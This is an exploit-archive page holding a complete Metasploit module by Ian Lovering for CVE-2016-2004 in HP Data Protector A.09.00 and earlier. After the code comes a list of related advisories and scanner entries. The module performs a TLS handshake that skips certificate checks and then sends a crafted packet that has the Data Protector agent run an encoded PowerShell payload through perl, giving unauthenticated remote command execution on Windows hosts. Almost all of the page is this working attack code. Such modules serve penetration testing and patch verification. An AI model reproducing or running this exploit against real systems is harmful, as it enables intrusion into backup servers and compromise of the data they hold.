Lucene search
Ian Lovering1337DAY-ID-25421HistoryMay 31, 2016 - 12:00 a.m.
HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)
2016-05-3100:00:00
Ian Lovering
0day.today
166
0.369 Low
EPSS
Percentile
97.2%
Exploit for windows platform in category remote exploits
# Exploit Title: Data Protector Encrypted Communications
# Date: 26-05-2016
# Exploit Author: Ian Lovering
# Vendor Homepage: http://www8.hp.com/uk/en/software-solutions/data-protector-backup-recovery-software/
# Version: A.09.00 and earlier
# Tested on: Windows Server 2008
# CVE : CVE-2016-2004
#
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/powershell'
require 'openssl'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => "HP Data Protector Encrypted Communication Remote Command Execution",
'Description' => %q{
This module exploits a well known remote code exection exploit after establishing encrypted control communications with a Data Protector agent. This allows exploitation of Data Protector agents that have been configured to only use encrypted control communications. This exploit works by executing the payload with Microsoft PowerShell so will only work against Windows Vista or newer. Tested against Data Protector 9.0 installed on Windows Server 2008 R2."
},
'License' => MSF_LICENSE,
'Author' => [ 'Ian Lovering' ],
'References' =>
[
[ 'CVE', '2016-2004' ],
],
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'WfsDelay' => 30,
'RPORT' => 5555
},
'Privileged' => false,
'DisclosureDate' => "Apr 18 2016",
'DefaultTarget' => 0))
end
def check
# For the check command
connect
sock.put(rand_text_alpha_upper(64))
response = sock.get_once(-1)
disconnect
if response.nil?
return Exploit::CheckCode::Safe
end
service_version = Rex::Text.to_ascii(response).chop.chomp
if service_version =~ /HP Data Protector/
print_status(service_version)
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def generate_dp_payload
command = cmd_psh_payload(
payload.encoded,
payload_instance.arch.first,
{ remove_comspec: true, encode_final_payload: true })
payload =
"\x32\x00\x01\x01\x01\x01\x01\x01" +
"\x00\x01\x00\x01\x00\x01\x00\x01" +
"\x01\x00\x20\x32\x38\x00\x5c\x70" +
"\x65\x72\x6c\x2e\x65\x78\x65\x00" +
"\x20\x2d\x65\x73\x79\x73\x74\x65" +
"\x6d('#{command}')\x00"
payload_length = [payload.length].pack('N')
return payload_length + payload
end
def exploit
# Main function
encryption_init_data =
"\x00\x00\x00\x48\xff\xfe\x32\x00\x36\x00\x37\x00\x00\x00\x20\x00" +
"\x31\x00\x30\x00\x00\x00\x20\x00\x31\x00\x30\x00\x30\x00\x00\x00" +
"\x20\x00\x39\x00\x30\x00\x30\x00\x00\x00\x20\x00\x38\x00\x38\x00" +
"\x00\x00\x20\x00\x6f\x00\x6d\x00\x6e\x00\x69\x00\x64\x00\x6c\x00" +
"\x63\x00\x00\x00\x20\x00\x34\x00\x00\x00\x00\x00"
print_status("Initiating connection")
# Open connection
connect
# Send init data
sock.put(encryption_init_data)
begin
buf = sock.get_once
rescue ::EOFError
end
print_status("Establishing encrypted channel")
# Create TLS / SSL context
sock.extend(Rex::Socket::SslTcp)
sock.sslctx = OpenSSL::SSL::SSLContext.new(:SSLv23)
sock.sslctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
sock.sslctx.options = OpenSSL::SSL::OP_ALL
# Enable TLS / SSL
sock.sslsock = OpenSSL::SSL::SSLSocket.new(sock, sock.sslctx)
sock.sslsock.connect
print_status("Sending payload")
# Send payload
sock.put(generate_dp_payload(), {timeout: 5})
# Close socket
disconnect
print_status("Waiting for payload execution (this can take up to 30 seconds or so)")
end
end
# 0day.today [2018-02-06] #Related
openvas
openvas
HP Data Protector Encrypted Communications Arbitrary Command Execution Vulnerability
2016-07-08 00:00:00
HP Data Protector Multiple Vulnerabilities (Apr 2016)
2016-04-26 00:00:00
saint
saint
HP Data Protector missing authentication
2016-05-31 00:00:00
HP Data Protector missing authentication
2016-05-31 00:00:00
HP Data Protector missing authentication
2016-05-31 00:00:00
nessus
nessus
zdt
zdt
HP Data Protector A.09.00 - Arbitrary Command Execution
2016-05-26 00:00:00
cert
cert
packetstorm
packetstorm
HP Data Protector Encrypted Communication Remote Command Execution
2016-06-07 00:00:00
HP Data Protector A.09.00 Command Execution
2016-05-26 00:00:00
exploitpack
exploitpack
HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)
2016-05-31 00:00:00
HP Data Protector A.09.00 - Arbitrary Command Execution
2016-05-26 00:00:00
checkpoint_advisories
checkpoint_advisories
HP Data Protector Remote Command Execution (CVE-2016-2004)
2016-10-26 00:00:00
exploitdb
exploitdb
HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)
2016-05-31 00:00:00
HP Data Protector A.09.00 - Arbitrary Command Execution
2016-05-26 00:00:00
cve
cve
CVE-2016-2004
2016-04-21 11:00:04
cvelist
cvelist
CVE-2016-2004
2016-04-21 10:00:00
prion
prion
Authentication flaw
2016-04-21 11:00:00
nvd
nvd
CVE-2016-2004
2016-04-21 11:00:04